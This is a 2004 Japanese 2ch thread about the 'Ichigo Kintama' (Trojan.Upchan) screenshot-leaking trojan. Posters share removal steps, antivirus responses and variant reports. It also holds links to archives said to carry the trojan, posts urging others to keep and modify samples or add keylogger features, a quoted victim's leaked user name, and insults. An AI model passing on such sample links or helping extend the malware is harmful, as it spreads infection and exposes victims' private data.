797 :[名無し]さん(bin+cue).rar:04/09/23 10:41:34 ID:xduUn+v/
つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ

798 :[名無し]さん(bin+cue).rar:04/09/23 10:42:55 ID:EMRLV6EZ
jpgで感染!?(゚д゚)すんのかよ!?

799 :[名無し]さん(bin+cue).rar:04/09/23 10:45:36 ID:LvJ+JBBu
>>798
するよ〜、jpg見るどころか、うpロダ逝ったら即感染ですよ
怖いよ〜ウィルスわ

800 :[名無し]さん(bin+cue).rar:04/09/23 10:52:21 ID:ky5A4Ls4
まあ、SP2な俺には関係ないが

801 :[名無し]さん(bin+cue).rar:04/09/23 10:54:42 ID:iqYKdWhe
>>798
まだしてないなら、すぐWindowsUpdataした方がいいよ。
って、「重要なパッチは、もうすでに当ててるだろ?」って認識で話するのは、やっぱり
やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の
脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと
言う事か。

802 :[名無し]さん(bin+cue).rar:04/09/23 10:55:44 ID:jZRbqOye
>>801
SP2を入れると不具合出そうで恐いよ〜。

803 :[名無し]さん(bin+cue).rar:04/09/23 10:56:54 ID:ky5A4Ls4
ttp://www.openwall.com/advisories/OW-002-netscape-jpeg/crash/
とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら
SP2を当てるかWindowsUpdateしないと危険。ちなみにノートソが反応するから、
ウイルス対策ソフト入れてる人は安心してもいいかもしれない

804 :[名無し]さん(bin+cue).rar:04/09/23 11:07:06 ID:EMRLV6EZ
2chブラウザのjpg垣間見機能でもだめか?

805 :[名無し]さん(bin+cue).rar:04/09/23 11:12:11 ID:jZxILG0u
>766
LANケーブル抜いてネット切断、それで首吊れ

806 :[名無し]さん(bin+cue).rar:04/09/23 11:12:12 ID:zW53Q5jb
苺きんたま対策(仮)
http://www.geocities.jp/ichigo_kintama/

まとめサイトできたようだ

807 :[名無し]さん(bin+cue).rar:04/09/23 11:14:52 ID:2DsdDYOp
>>469
ダウンロードできないんだけど、もう削除されたかな?

808 :[名無し]さん(bin+cue).rar:04/09/23 11:22:10 ID:PFKtStB6
>>766
再起動してタスクマネージャー開いてプロセス見ろ。
それでshellsystem.exeを終了させろ。
これで動作は速くなる。
あとはレジストリでshellsystem.exeを削除すれば終了


809 :[名無し]さん(bin+cue).rar:04/09/23 11:24:03 ID:sH8yfJe2
マルチプロセスだからタスクマネージャからは消せんぞ。

810 :[名無し]さん(bin+cue).rar:04/09/23 11:27:07 ID:PFKtStB6
>>809
遊びで感染したんだが、再起動させたら俺は消せた。
なんでかはわからん

811 :[名無し]さん(bin+cue).rar:04/09/23 11:31:26 ID:cDvdfQLH
112 名前:eatkyo287016.adsl.ppp.infoweb.ne.jp@Share使用中 ◆i.ESDXOLYY [] 投稿日:04/09/23 10:43:42 ID:La2FDeZx
{Now!}俺のクリップボード(50byte 10行抜粋版, 何もコピーしてません)
〜何も無いので環境変数晒し〜

コンピュータ名: VIP
ユーザー名: takehiro


ワロタ

812 :[名無し]さん(bin+cue).rar:04/09/23 12:35:25 ID:2aG10cCS
俺どうせ割れ窓だから笑えるユーザー名でわざと踏んで晒してみるか
ほりえもんとか毎日新聞で凶悪ぺド画像とか

813 :[名無し]さん(bin+cue).rar:04/09/23 12:43:24 ID:IQ9BvSXd
しまった、祭りに乗り遅れた。
nyか洒落にあがってないかな(w

814 :[名無し]さん(bin+cue).rar:04/09/23 12:45:03 ID:tyH5EMtg
>>813
京都府警にしてよ

815 :[名無し]さん(bin+cue).rar:04/09/23 12:46:19 ID:k8gkpGNZ
このトロイの動作解説ページってまだないかな。

なんかおもしろそうだから感染させてみたいんだが。

816 :[名無し]さん(bin+cue).rar:04/09/23 12:46:30 ID:IqZ2HObi
× しまった、祭りに乗り遅れた。

○ うお
  完璧乗り遅れた


817 :[名無し]さん(bin+cue).rar:04/09/23 12:49:27 ID:k8gkpGNZ
Winnyを立ち上げてない限り,被害はないんだろ?
何で祭りになってんだ??

818 :[名無し]さん(bin+cue).rar:04/09/23 12:51:17 ID:cDvdfQLH
初級ネットワーク板ローカルルール申請
http://qb5.2ch.net/test/read.cgi/operate/1095695740/

Share10_a56 + [9月21日付]ノードリストの文字列が多い・・・あやしいな

819 :[名無し]さん(bin+cue).rar:04/09/23 12:56:30 ID:J5HdIDac
「Share10_a56 + [9月21日付]ノードリスト」ってファイルにウィルス入ってるんだろうな

820 :[名無し]さん(bin+cue).rar:04/09/23 12:57:37 ID:pr4shzQV
>>817
nyは関係ない

821 :[名無し]さん(bin+cue).rar:04/09/23 12:59:51 ID:lSmv7nYn
ファイル名変えて、あちこちに貼られてら。

822 :[名無し]さん(bin+cue).rar:04/09/23 13:00:20 ID:xCg9vDsC
なんか、もれのデスクトップ画像が2chアプロと言う
どこかにアップされているらしいです。

それを見て自分を笑いたいのですが、どこにあるか
分かりますでしょうか。

823 :[名無し]さん(bin+cue).rar:04/09/23 13:00:37 ID:RdY8SqQw
俺はVirtual PC上のWinMEでny実行してるから、晒されても問題ないな。
しかもホストOSはOS Xだし

824 :[名無し]さん(bin+cue).rar:04/09/23 13:02:37 ID:cDvdfQLH
Share10_a56 + [9月21日付]ノードリスト 18禁無修正ガンダム画像映画動画一般コミックエロゲ
PS2PV巨乳アニメゲーム一般ゲームサントラアルバムMAD無修正アプリ写真集DVD.zip
1,219,360
13deb3c8b87346cd5b1a9de9029c855fc7b6128e

これか

825 :[名無し]さん(bin+cue).rar:04/09/23 13:08:21 ID:NktT5qfN
7-zip反則だな。これなら1/3近くにもなるわけだ。

7-Zip (A) 3.12 Copyright (c) 1999-2003 Igor Pavlov 2003-12-10

Listing archive: F:\DESKTOP\キンタ~1.7Z

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------
2004-09-22 15:57:10 ....A 677376 319288 (写真集) (ロリータ) 水原友里.exe
2004-09-22 15:57:10 ....A 677376 0   (写真集) (ロリータ) 相田香奈子.exe
2004-09-22 15:57:10 ....A 677376 0  コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
------------------- ----- ------------ ------------ ------------
2032128 319288 3 files

キンタ~1 7Z 319,524 04-09-23 12:58 キンタマ詰合.up1360.7z
キンタ~1 BZA 1,003,287 04-09-23 13:00 キンタマ詰合.up1360.bza
キンタ~1 CAB 1,032,957 04-09-23 13:00 キンタマ詰合.up1360.cab
キンタ~1 YZ1 1,055,366 04-09-23 12:58 キンタマ詰合.up1360.yz1
キンタ~1 ZIP 1,033,786 04-09-22 21:25 キンタマ詰合.up1360.zip


826 :[名無し]さん(bin+cue).rar:04/09/23 13:09:25 ID:cDvdfQLH
ナニソレ

827 :[名無し]さん(bin+cue).rar:04/09/23 13:14:14 ID:EKR+VzAM
これってjpgのリンク踏んだだけで感染するんですか

828 :[名無し]さん(bin+cue).rar:04/09/23 13:17:14 ID:cDvdfQLH
no

829 :[名無し]さん(bin+cue).rar:04/09/23 13:29:10 ID:JTze3qp6
SSの機能を無効にする方法って無いの?

830 :[名無し]さん(bin+cue).rar:04/09/23 13:30:03 ID:H4H6HXnY
新種のキンタマが開発されたと聞いて飛んできました


ノートン先生がスルー・・・? ガクガクブルブル


831 :[名無し]さん(bin+cue).rar:04/09/23 13:32:02 ID:joit0XmS
ファイル踏んだ覚えないのにshellsystem.exeがレジストリにあった場合は
感染してるんでしょうか
プロセスなどにはshellsystem.exeはありませんでした

832 :[名無し]さん(bin+cue).rar:04/09/23 13:34:53 ID:Y12C9VC7
>>831
どうせ検索の履歴だろ

833 :[名無し]さん(bin+cue).rar:04/09/23 13:35:15 ID:H4H6HXnY
>>831
削除するに越した事は無いんじゃないですか?

834 :[名無し]さん(bin+cue).rar:04/09/23 13:39:50 ID:joit0XmS
Microsoft\search Assiant\ACMru\5603の位置にあったので検索履歴みたいです
ありがとうございました

835 :[名無し]さん(bin+cue).rar:04/09/23 14:25:04 ID:ungvXIMz
test

836 :[名無し]さん(bin+cue).rar:04/09/23 14:58:32 ID:xduUn+v/
>>825
その実験は興味深いな、7zなら重複ファイル簡単に探せるね。
CRCを見てて、同じだったらファイル名だけ残して捨てるんだな
つか、一見、普通のファイル集合体のようで、展開したら
むちゃくちゃ容量食う圧縮爆弾を簡単に作れるじゃねーか。怖。

ちなみにrarだと800KBぐらい

837 :[名無し]さん(bin+cue).rar:04/09/23 15:02:36 ID:mmGHQUsE
exe ファイル 捨てたい

838 :[名無し]さん(bin+cue).rar:04/09/23 15:08:30 ID:jZRbqOye
苺きんたまきんたま
http://www.geocities.jp/ichigo_kintama/
これを。

839 :[名無し]さん(bin+cue).rar:04/09/23 15:25:44 ID:UZ3hgOe/
>>837
602 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:03:45 ID:mmGHQUsE
俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。

610 名前:[名無し]さん(bin+cue).rar[] 投稿日:04/09/23(木) 00:09:58 ID:mmGHQUsE
>>604
作者は力入れるとこ間違ってる気がする。

629 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:29:36 ID:mmGHQUsE
おいおまいら関祭りには参加しなかったのか?

634 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:35:59 ID:mmGHQUsE
tesu



840 :[名無し]さん(bin+cue).rar:04/09/23 15:26:49 ID:UZ3hgOe/

637 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:39:46 ID:mmGHQUsE
てす

639 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 00:42:44 ID:mmGHQUsE
ニュー速で規制されたorz
90秒ってなげーよ・・・

662 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 01:10:41 ID:mmGHQUsE
しかし久々にflashget使ったよw

668 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 01:35:42 ID:mmGHQUsE
もううpはやんだの?

679 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 02:47:44 ID:mmGHQUsE
あ〜面白かった。三日分は笑ったな。


837 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:04/09/23(木) 15:02:36 ID:mmGHQUsE
exe ファイル 捨てたい

841 :[名無し]さん(bin+cue).rar:04/09/23 16:00:42 ID:gRp4IpXR
なになに?笑って見てたら笑えない状況になったのかID:mmGHQUsEは?

842 :[名無し]さん(bin+cue).rar:04/09/23 16:06:35 ID:QGmLVuGv
txtなどのアイコンの変更はどうやるのでしょうか?

843 :[名無し]さん(bin+cue).rar:04/09/23 16:18:48 ID:qaAkrrtW
>>840
837で爆笑

844 :[名無し]さん(bin+cue).rar:04/09/23 16:22:49 ID:L1ZU8rVo
>841
ドゾー
http://that3.2ch.net/test/read.cgi/gline/1095873352/l50

845 :627:04/09/23 16:24:41 ID:Q+leSqll
ノートン先生から解析結果が届いたのでコピペします。
-------------------------------------------------------------------
Subject:[CLOSING]: Symantec Security Response Automation:Tracking No. ********

日付: 22-09-2004
(個人情報に付き削除) 様

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: Q:\2ch\(写真集) (ロリータ) 水原友里.exe
コンピュータ: (個人情報に付き削除)
結果: このファイルは次のウィルスに感染しています:
Trojan.Upchan
デベロッパーノート
:
Q:\2ch\(写真集) (ロリータ) 水原友里.exe is non-repairable threat.
NAV with the latest rapidrelease definition detects this. Please delete this file and replace it if neccessary.
Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、
このメールの末尾に書かれた手順にしたがってインストールしてください。

個別対応版定義ファイルのインストール方法:
1. 添付された定義ファイルの更新版を保存します。
2. 保存したファイルをダブルクリックし、画面の指示に従って操作します。
-------------------------------------------------------------------

846 :[名無し]さん(bin+cue).rar:04/09/23 16:26:59 ID:t4uJAFpV
>>845
Upchanって・・・。それにしても対応早いな。
バスターまだ〜(AA略)

847 :[名無し]さん(bin+cue).rar:04/09/23 16:28:51 ID:Pi3bt/OK
>保存したファイルをダブルクリックし、画面の指示に従って操作します。
ICHIGOウイルースに感染した香具師はトラウマに…

848 :[名無し]さん(bin+cue).rar:04/09/23 16:30:52 ID:62NRg8JO
>>845 おぉ先生きたか
     >Trojan.Upchan  あっぷちゃん、もしくはうぷちゃん 
    苺キンタマは却下かw

849 :627:04/09/23 16:33:37 ID:Q+leSqll
添付されていた定義パッチで
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
を「Trojan.Upchan」として検出できることを確認。

というわけで一般向けには次回定義更新時の定義でサポートされると思われ。

>>846
バスターの検体提出方法は不明だが
ノートン先生見たく検疫ソフトで送信できるなら誰か持ってる奴が送信した方がはやいよ。

850 :[名無し]さん(bin+cue).rar:04/09/23 16:41:53 ID:soiSa9lC
35 名前:水先案名無い人[sage] 投稿日:04/09/23 02:23:45 ID:ccAq4UYb
簡単な説明

とある人物がうpロダにうpられているexeを実行

そのexeはキンタマウィルスと同じようなデスクトップ画像を晒されるウィルス入り
このウィルスは8分置きに2chうpロダにデスクトップ画像をうpられ角煮のアップローダスレに自動で書き込まれる

そしてこのウィルスにかかっている事を知った当の本人は必死になって削除方法検索
その時の検索ワードが「exe ファイル 捨てたい」
この検索結果の画像を上記に書かれているウィルスによって自動でスレに書き込まれスレ住人を爆笑の渦へ

おわり


↑わるいがワロタ

851 :[名無し]さん(bin+cue).rar:04/09/23 16:45:57 ID:cDvdfQLH
俺でさえも(ry は対策しないんだなw

852 :[名無し]さん(bin+cue).rar:04/09/23 16:52:19 ID:pr4shzQV
バスター更新キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
けど、対応してるのかな

853 :[名無し]さん(bin+cue).rar:04/09/23 16:53:18 ID:mva2OVxj
>>852
人柱

854 :[名無し]さん(bin+cue).rar:04/09/23 17:16:25 ID:/+AT9169
で、対応はどうなんだ?
漏れバスター無いから確かめられんのよね…

855 :627:04/09/23 17:24:35 ID:Q+leSqll
とりあえず定義パッチ。

ttp://rupan.zive.net/~kain/cgi-bin/upload/src/up0555.zip
Pass:NAV32

Name MD5 Bytes
---------- -------------------------------- ----------
apache.zip C12EB402A934A29D4DC44FEAD7BD1964 5,353,391
-------------------------------------------------------
Total 1 Files 5,353,391 Bytes


Name MD5 Bytes
----------- -------------------------------- ---------
updat32.exe FFA6D54E96FB2E825A0ADD93C93D689E 5,502,200
--------------------------------------------------------
Total 1 Files 5,502,200 Bytes


856 :[名無し]さん(bin+cue).rar:04/09/23 17:34:08 ID:Q+leSqll
>>852
ノートン先生はこの騒ぎのあとに定義更新があったけど未対応だった…
#確認するにもブツを持ってないとできないしな

857 :[名無し]さん(bin+cue).rar:04/09/23 17:37:40 ID:Pi3bt/OK
>>856
きました

858 :[名無し]さん(bin+cue).rar:04/09/23 17:44:31 ID:t4uJAFpV
>>852
パターンみたけどUpchanみたいに判りやすい名前は無かったな。
多分、未対応だと思う。

859 :test ◆NJ8QhBoOZU :04/09/23 17:44:38 ID:VAVDavsr
test

860 :[名無し]さん(bin+cue).rar:04/09/23 17:46:46 ID:qaAkrrtW
「exe ファイル 捨てたい」
(・∀・)イイ!!ワラタワラタ

861 :[名無し]さん(bin+cue).rar:04/09/23 17:51:20 ID:xduUn+v/
>>856
テストマシンに定義パッチ当てた。飼ってる苺キンタマは見事にヒット
(はじめrarの中に入れておいたからヒットしなかったよ)
Upchanの詳細情報まではなし。Up 2ch/苺ch という意味か…

862 :[名無し]さん(bin+cue).rar:04/09/23 18:04:49 ID:u+ulJzWX
http://that3.2ch.net/test/read.cgi/gline/1030921732/572

863 :[名無し]さん(bin+cue).rar:04/09/23 18:06:11 ID:AH6SroMo
Trojan.ichigokintama
Trojan.berryballs

864 :[名無し]さん(bin+cue).rar:04/09/23 18:30:39 ID:GPZkaXV9
ttp://picopico.dip.jp/ragnarok/data/1/1095925509796_AreTool25.zip
これのragnarok\config.txt・・・.exeにひっかかりました。
ダブルクリックした瞬間にひっかかったと気づいたので急いで回線を抜きました。
亜種でしょうか?プロセスを見てもD:\WINDOWS\shellsystem.exeとは出ませんでした。(D:\にOSを入れてます)
かわりにD:\WINDOWS\sugoimonoss.comというコマンドプロンプトのファイルが生成されました。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sugoimonoss.com を
レジストリからも消しました。
とりあえず削除してPCを落としました。

セーフモードで起動したらsugoimonoss.comが復活していたので削除しました。上の元ファイルも削除しました。
レジストリを確認してみると同じ場所にはありませんでした。

そして再起動したらsugoimonoss.comは復活してなかったのでもう平気でしょうか?
いまはサブパソコンから書き込みしています。

865 :[名無し]さん(bin+cue).rar:04/09/23 18:38:07 ID:IFT2b9V5
>>864
みんな超能力者じゃないから断言できないけどたぶん大丈夫。

866 :627:04/09/23 18:41:45 ID:Q+leSqll
>>852
バスターは持ってないのでトレンドマイクロの
オンラインスキャンを利用してスキャンしてみたが未検出でしたので未対応のようです。


なのでバスター使いの誰かが提出するか
トレンドマイクロの中の人が気づくまで対応されないと思われます。

#提出しようと思ったが
#なんか製品登録したやつしか提出できない感じ…

867 :[名無し]さん(bin+cue).rar:04/09/23 18:47:10 ID:mva2OVxj
Share(仮称) ウイルス情報
http://tmp4.2ch.net/test/read.cgi/download/1095907115/

868 :[名無し]さん(bin+cue).rar:04/09/23 18:48:59 ID:HP1mtfoW
>>866
ウイルス情報は各社が共有する紳士協定みたいなのがあるから
バスターも対応すると思われ

869 :[名無し]さん(bin+cue).rar:04/09/23 18:54:10 ID:rPkWk6Jz
最初の被害者で晒しまくった挙句、角煮にも降臨したのが
ユーザー名 YUSUKE という香具師だった
そこで、チャネラの間では、このウイルスをYUSUKEキンタマリアと名付ける動きがあった

870 :[名無し]さん(bin+cue).rar:04/09/23 18:54:42 ID:7p6CJmmF
>>866
バスターには昨日夜提出しておいたが、流石に一日じゃ解析からパターンファイル作成まで行かないみたいだな・・・
868の言うとおり、もう少し待てば対応するはず・・・

871 :[名無し]さん(bin+cue).rar:04/09/23 18:56:07 ID:+Y3dTfL1
えーと、苺キンタマってローカルネットワーク対応?
ぶっちゃけ言うと1台に感染したらLAN接続してる別PCにも勝手に伝播しますか?

872 :バスター使い:04/09/23 18:56:44 ID:rQ28x1D5
>>870
提出乙!

873 :[名無し]さん(bin+cue).rar:04/09/23 18:58:13 ID:JaZKld0M
ジュブナイルのユースケ!を思い出す

874 :[名無し]さん(bin+cue).rar:04/09/23 19:09:20 ID:GPZkaXV9
>>864
これって新種?

875 :[名無し]さん(bin+cue).rar:04/09/23 19:12:44 ID:xduUn+v/
>>864
落ちてこないよ。解析したいのに。

876 :[名無し]さん(bin+cue).rar:04/09/23 19:20:25 ID:xduUn+v/
>>864
で、見てみた。
苺キンタマと中身はそっくり、ただし、>>855のノートン先生の定義パッチでは無反応
新種というか亜種 確定。

やはり、類似品を簡単に作れるような設計になってるみたいだな。
こりゃ、しばらく祭り継続だな



877 :[名無し]さん(bin+cue).rar:04/09/23 19:23:59 ID:T4ToCva4
>>876
うp先はどこなん?

878 :[名無し]さん(bin+cue).rar:04/09/23 19:31:53 ID:LXjx4AWF
シマンテック ウイルス感染の疑いがあるファイルを Symantec Security Response に提出する方法
http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

879 :[名無し]さん(bin+cue).rar:04/09/23 19:33:26 ID:/oIKzfHB

亜種にはfusiana機能も付けてほしい

あとwebカメラ設置者はそっちが起動されるとかね〜
 


880 :[名無し]さん(bin+cue).rar:04/09/23 19:34:29 ID:62NRg8JO
休みが明けて電源を入れたら壮大な祭りになる悪寒…
公的機関、企業の内部情報…個人情報と個人の性癖はもう晒されてるし
ど素人は原種がAVで引っかかっても、亜種には対応してないから安心しそうだ
まだまだ祭りは終わらないねこりゃ…

881 :[名無し]さん(bin+cue).rar:04/09/23 19:40:09 ID:GPZkaXV9
>>876
再起動したら自動でsugoimonoss.comが起動して感染する仕組みだったのでしょうか?
それともそれ単体で動作するのですか?
踏んだ直後にプロセスを見ても何もありませんでした。
レジストリのRun\のなかにsugoimonoss.comがあったので気づいたのですが・・・。

882 :[名無し]さん(bin+cue).rar:04/09/23 19:40:27 ID:+moW+9Lf
亜種はノートン反応無しとは
楽しい日々はまだまだ続くかな?

883 :[名無し]さん(bin+cue).rar:04/09/23 19:40:40 ID:dlC1dSfw
すごいことになりそうだな…

884 :[名無し]さん(bin+cue).rar:04/09/23 19:40:45 ID:RzyOzwfF
>>881
うっせラグナロクのチーターは死ねよww

885 :[名無し]さん(bin+cue).rar:04/09/23 19:42:44 ID:GPZkaXV9
ラグナロク知ってる人しかわからないレスごめんなさい
>>884
あのあぷろだには普段はチートツールはうpされないから多分罠ツールだと思って落としてみて、config開いたらウィルスだった。
罠ツールを集めるのが趣味なんです。

886 :[名無し]さん(bin+cue).rar:04/09/23 19:44:42 ID:bDi76u+h
これは早めに次スレがいるね。

887 :[名無し]さん(bin+cue).rar:04/09/23 19:44:59 ID:LvJ+JBBu
>>864
亜種キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

つーか、当然そうなる罠

888 :[名無し]さん(bin+cue).rar:04/09/23 19:48:49 ID:RzyOzwfF
亜種保管しておこうぜ
いろいろ使えそう

889 :[名無し]さん(bin+cue).rar:04/09/23 19:51:55 ID:mgVunU57
亜種はいずれ対応されてしまう。
それよりオリジナルを確保しておいて自分で適宜改良して使うが吉。


で、だれか新型に感染してみたか?
節穴機能は追加されたんだろうか……

890 ::[名無し]さん(bin+cue).rar :04/09/23 19:52:34 ID:pNUKkC8s
ウィルスバスターかけていたらwindowsやシステム32のほとんどが
dllやexeなんですがこれっておかしいのでしょうか?

891 :[名無し]さん(bin+cue).rar:04/09/23 19:53:31 ID:h0nUPIzO
てかなんでお前らウィルス肯定してんだ

対策しないと2chが訴えられてまた閉鎖騒ぎになるってのに

892 :[名無し]さん(bin+cue).rar:04/09/23 19:54:58 ID:wZ9Gu9IX
本当に

893 :[名無し]さん(bin+cue).rar:04/09/23 19:55:07 ID:bL7m252I
ほむ、2chが閉鎖となると大変なことになってしまいますね・・・
なんとか対策をたてましょう

894 :[名無し]さん(bin+cue).rar:04/09/23 19:55:09 ID:VuLxnNRm
>>890
パソコン雑誌 買いなさい!必ず買いなさい!

895 :[名無し]さん(bin+cue).rar:04/09/23 19:55:33 ID:l0b9RDPZ
キーロガーとか、kakikomi.txtうp機能とか
どんどん機能拡張していって欲しい

896 :[名無し]さん(bin+cue).rar:04/09/23 19:56:14 ID:r7vcxVQ0
きんたま感染したぽ・・
>>855はDLできないしレジストリで消しても復活するし・・

897 :[名無し]さん(bin+cue).rar:04/09/23 19:59:02 ID:h0nUPIzO
別スレにも書いたんだけど
96 :名無したん(;´Д`)ハァハァ :04/09/23 19:56:41 ID:11SxMVKb
>>91
・2chうpろだにうpされてるあたり2ch閲覧者の犯行
・2chねらーが個人情報画像わざわざ晒しあげしてやがる
・これまですべての板内のトラブルはひろゆきへ損害賠償
・今回の場合被害者の数が今までと比較にならない

898 :[名無し]さん(bin+cue).rar:04/09/23 20:00:12 ID:CHjM5zzS
>>896
いちごきんたまなら>>604

899 :[名無し]さん(bin+cue).rar:04/09/23 20:01:29 ID:r7vcxVQ0
セーフモードってなんですか?・・
お願いします。

900 :[名無し]さん(bin+cue).rar:04/09/23 20:02:18 ID:0IaPSUs5
>>899
検索もできませんか

901 :[名無し]さん(bin+cue).rar:04/09/23 20:02:42 ID:JKMNRGue
>>899
いいから、寝ろ。

902 :[名無し]さん(bin+cue).rar:04/09/23 20:02:59 ID:xdINSUdZ
>>899
おまえはググる事も出来ないのか?

903 :[名無し]さん(bin+cue).rar:04/09/23 20:04:17 ID:C3nZ381I
>>899
死ね


904 :[名無し]さん(bin+cue).rar:04/09/23 20:04:24 ID:h0nUPIzO
3人で叩きケコーンとは悲惨な

905 :[名無し]さん(bin+cue).rar:04/09/23 20:04:27 ID:FmEEJd2e
質問してるヤシは感染者か?

906 :[名無し]さん(bin+cue).rar:04/09/23 20:05:45 ID:U1wYwujU
記念としてとっておきたい、元ファイルくれませんか?

907 :[名無し]さん(bin+cue).rar:04/09/23 20:05:51 ID:OB9dwy0R
>>899
くだらない事言ってないで早く働けよ

908 :[名無し]さん(bin+cue).rar:04/09/23 20:06:48 ID:r7vcxVQ0
感染者です。
ttp://higaitaisaku.web.infoseek.co.jp/safemode.html
msconfigと検索しても出てきません・・
重いからなのでしょうか?


909 :[名無し]さん(bin+cue).rar:04/09/23 20:07:24 ID:l0b9RDPZ
なんとなくだがキンタマウイルス作成者も
2chをフシアナトラップで荒らした香具師も同一人物のような気がするぞ

910 :[名無し]さん(bin+cue).rar:04/09/23 20:12:28 ID:mgVunU57
2ch閉鎖騒動が起こるならそれもまたよし。
次はどこへいくか、誰がやるか、という問題提起になるからな。

……ならないか。

911 :[名無し]さん(bin+cue).rar:04/09/23 20:13:07 ID:PDZ9NpvK
今回の件で2chやひろゆきになんか責任発生するか?

912 :[名無し]さん(bin+cue).rar:04/09/23 20:13:23 ID:yaHp/7Av
この間発覚した多くの○○○の脆弱性と組み合わされたら、恐ろしいことになる悪寒。
○○○→須磨祖。マジで悪用されたらまずいだろうから。(見当は付くよな)

913 :[名無し]さん(bin+cue).rar:04/09/23 20:13:51 ID:C3nZ381I
>>908
基本中の基本すら学習しない状態でnyなんかに手を出した事を悔やむこったな。
自業自得だっての。


914 :[名無し]さん(bin+cue).rar:04/09/23 20:15:51 ID:Eei9QNEZ
>>911
しないよ

915 :837:04/09/23 20:21:06 ID:mmGHQUsE
亀レスだけどさぁ。別に俺は感染してないから。
ただヤフー検索でexe ファイル 捨てたいって
検索してるssがうpされてて面白かったから書き込んだだけ。

916 :[名無し]さん(bin+cue).rar:04/09/23 20:22:32 ID:qaAkrrtW
>>915
わーってるよ

917 :[名無し]さん(bin+cue).rar:04/09/23 20:22:56 ID:KYU7HFHZ
このスレ見てるね
http://v.isp.2ch.net/up/c50185416f55.jpg

918 :[名無し]さん(bin+cue).rar:04/09/23 20:24:02 ID:mgVunU57
今後次第だろ。
今ぐらいの規模ならともかく、大流行とかヤバイものが晒されたりとかしたらどうなるかわからん。
例えば某○○○○犯罪対策室から感染者が出ちゃうとかな。

無理を通せば道理が引っ込むのはオマイラも知ってのとおり。

919 :[名無し]さん(bin+cue).rar:04/09/23 20:24:55 ID:h0nUPIzO
個人メルアドとかヤフオクIDとパスとか流出してるのはどうなのよ

920 :[名無し]さん(bin+cue).rar:04/09/23 20:24:56 ID:3F3YfAd9
>>908
それだけではどういう状況かサッパリ他人には伝わらないだろう
自分がどういう環境を持っていて、どういうものに感染して
今まで何をやってどこで躓いているのかくらいは書かないと

重いからというより、アホだから?

921 :[名無し]さん(bin+cue).rar:04/09/23 20:25:35 ID:mmGHQUsE
>>916
ならいいけどね

922 :[名無し]さん(bin+cue).rar:04/09/23 20:25:41 ID:mgVunU57
>>918は閉鎖の件ですた。


俺はダメだったけど、一応早めにスレ立てしといた方が良いんじゃない?
というわけで↓よろ。

923 :[名無し]さん(bin+cue).rar:04/09/23 20:26:45 ID:r7vcxVQ0
さっきのものです。
セーフモードで2つのファイルを消去しました。
下の2つの意味がわからなかったのですが・・・

924 :[名無し]さん(bin+cue).rar:04/09/23 20:27:25 ID:wZ9Gu9IX

次はスレたてね

925 :[名無し]さん(bin+cue).rar:04/09/23 20:33:34 ID:C3nZ381I
>>920
基礎知識が無さ過ぎて説明出来ないだけだろ。
こんなアホにいちいち説明してたらスレ一つ使い切っても足りんよ。



926 :[名無し]さん(bin+cue).rar:04/09/23 20:44:19 ID:g0/m5KiY
亜種が出ているスレ。
スレストまでされてます。

今週のジャンプがうpされているんだが…
http://news13.2ch.net/test/read.cgi/news/1095933187/

927 :627:04/09/23 20:48:35 ID:Q+leSqll
>>876
とりあえずノートン先生には提出完了

928 :[名無し]さん(bin+cue).rar:04/09/23 20:48:35 ID:Ze0M08FR
config.txt ....exeの分を更新したと思ったらまた亜種か・・・orz

929 :[名無し]さん(bin+cue).rar:04/09/23 20:51:03 ID:LvJ+JBBu
>>926
他のスレでも調子に乗ったバカが亜種をうpしてるのを見たぞ
バカだなぁこいつら、捕まるともしらんでw

930 :[名無し]さん(bin+cue).rar:04/09/23 20:54:00 ID:RzyOzwfF
キンタマ亜種

今週のジャンプがうpされているんだが…
http://news13.2ch.net/test/read.cgi/news/1095933187/

931 :[名無し]さん(bin+cue).rar:04/09/23 20:55:00 ID:adI/sxzM
もう収拾つかんね。京○府○の仕事が山盛りだな。

932 :[名無し]さん(bin+cue).rar:04/09/23 20:55:50 ID:wZ9Gu9IX
頑張ってくれよK察

933 :[名無し]さん(bin+cue).rar:04/09/23 20:56:15 ID:h0nUPIzO
亜種ってどれくらいいるんだろう

934 :[名無し]さん(bin+cue).rar:04/09/23 20:56:19 ID:Ze0M08FR
ファイルサイズもファイル名もオリジナルと同じだなあ。ほんとに亜種か?
友達にノートン先生がいるひと、よろしく。

935 :[名無し]さん(bin+cue).rar:04/09/23 20:56:46 ID:CeMeBwCa
>>934
CRC比較きぼん

936 :[名無し]さん(bin+cue).rar:04/09/23 20:57:36 ID:ONxIjWCf
>>926
これは最初のヤツでしょ
中身はロリ写真集だし、ノートンパッチで反応あり削除されました

937 :[名無し]さん(bin+cue).rar:04/09/23 20:59:30 ID:h0nUPIzO
